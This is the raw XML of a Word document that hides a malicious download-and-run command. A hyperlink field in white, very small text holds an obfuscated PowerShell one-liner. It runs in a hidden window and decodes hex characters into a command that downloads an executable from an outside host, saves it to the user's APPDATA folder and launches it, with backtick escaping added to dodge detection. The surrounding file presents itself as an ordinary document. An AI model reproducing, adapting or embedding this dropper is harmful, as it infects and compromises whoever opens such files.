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1558DAC" w14:textId="159E2782" w:rsidR="00B07850" w:rsidRPr="00A549DB" w:rsidRDefault="00A549DB">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A549DB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A549DB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "file://C:\\Users\\admin\\Desktop\\cod\\Cabinmyke\\Powershell.exe%20%20-w%20h%20$asciiChars='27%2028%2026%2028%2027%202B%2027%2047%2027%202B%2027%2043%204D%2027%202B%2027%2020%202A%2057%202D%204F%202A%2029%2027%202B%2020%2027%204E%2027%202B%2027</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A549DB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText>%2065%2074%202E%2027%202B%2027%2057%2027%202B%2027%2065%2062%2027%202B%2027%2043%206C%2027%202B%2027%2069%2027%202B%2027%2065%206E%2074%2029%2027%202B%2027%202E%2044%2027%202B%2027%206F%2077%2027%202B%2027%206E%206C%2027%202B%2027%206F%2027%202B%2027%2061%</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A549DB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText>2064%2027%202B%2027%2046%2027%202B%2027%2069%2027%202B%2027%206C%2027%202B%2027%2065%2028%2027%2027%2068%2074%2074%2070%203A%202F%202F%206B%2075%2073%2074%206F%2072%202E%206D%206C%202F%2070%2075%2074%2074%2079%2074%2065%2073%2074%202E%2065%2078%2065%2027%2</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A549DB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText>027%202C%2024%2065%206E%2076%203A%2041%2050%2050%2044%2041%2054%2041%202B%2027%2027%205C%2027%2027%202B%2027%2027%2074%2065%2073%2074%202E%2065%2078%2065%2027%2027%2029%2027%207C%2049%2060%2045%2060%2058%203B%2020%2073%2074%2061%2072%2074%202D%2070%2072%20</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A549DB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText>6F%2063%2065%2073%2073%2028%2024%2065%206E%2076%203A%2041%2050%2050%2044%2041%2054%2041%202B%2027%205C%2027%202B%2027%2074%2065%2073%2074%202E%2065%2078%2065%2027%2029';$jm=$asciiChars.Split('%20')%20|%20forEach%20%7b%5bchar%5d(%5bconvert%5d::toint16($_,16</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A549DB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:instrText xml:space="preserve">))%7d;$jm%20-join%20''|I%60E%60X" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A549DB">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>Powershell.exe  -w h $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>asciiChars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">='27 28 26 28 27 2B 27 47 27 2B 27 43 4D 27 2B 27 20 2A 57 2D 4F 2A 29 27 2B 20 27 4E 27 2B 27 65 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 6C 27 2B 27 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 27 2B 27 61 64 27 2B 27 46 27 2B 27 69 27 2B 27 6C 27 2B 27 65 28 27 27 68 74 74 70 3A 2F </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>2F</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6B 75 73 74 6F 72 2E 6D 6C 2F 70 75 74 74 79 74 65 73 74 2E 65 78 65 27 27 2C 24 65 6E 76 3A 41 50 50 44 41 54 41 2B 27 27 5C 27 27 2B 27 27 74 65 73 74 2E 65 78 65 27 27 29 27 7C 49 60 45 60 58 3B 20 73 74 61 72 74 2D 70 72 6F 63 65 73 73 28 24 65 6E 76 3A 41 50 50 44 41 54 41 2B 27 5C 27 2B 27 74 65 73 74 2E 65 78 65 27 29';$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>jm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>asciiChars.Split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">(' ') | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> {[char]([convert]::toint16($_,16))};$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>jm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F4E07" w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> -join ''|I`E`X</w:t>
      </w:r>
      <w:r w:rsidRPr="00A549DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E6577" w14:textId="53352AD0" w:rsidR="00A549DB" w:rsidRPr="00A549DB" w:rsidRDefault="00A549DB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71DD7579" wp14:editId="17D7F741">
            <wp:extent cx="5727700" cy="3397250"/>
            <wp:effectExtent l="0" t="0" r="635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700" cy="3397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549DB" w:rsidRPr="00A549D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7EB7"/>
    <w:rsid w:val="00142351"/>
    <w:rsid w:val="00287EB7"/>
    <w:rsid w:val="003F4E07"/>
    <w:rsid w:val="0043096E"/>
    <w:rsid w:val="00A549DB"/>
    <w:rsid w:val="00B078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196E03"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6BEC4674-D0C1-46A6-A9A6-21E63CE524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F4E0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F4E0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313</Words>
  <Characters>1787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mnb joker</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-30T21:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-30T21:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>